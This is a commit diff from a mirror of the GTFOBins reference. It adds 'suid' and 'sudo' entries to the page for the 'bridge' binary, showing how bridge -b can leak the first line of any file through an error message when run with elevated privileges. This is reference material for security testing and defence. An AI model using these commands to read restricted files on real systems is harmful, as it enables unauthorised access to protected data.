mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Add suid and sudo to bridge
This commit is contained in:
parent
629501ccc7
commit
f7ff2ea852
@ -1,8 +1,16 @@
|
|||||||
---
|
---
|
||||||
|
description: Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.
|
||||||
functions:
|
functions:
|
||||||
file-read:
|
file-read:
|
||||||
- description: Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.
|
- code: |
|
||||||
code: |
|
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
bridge -b "$LFILE"
|
bridge -b "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./bridge -b "$LFILE"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo bridge -b "$LFILE"
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user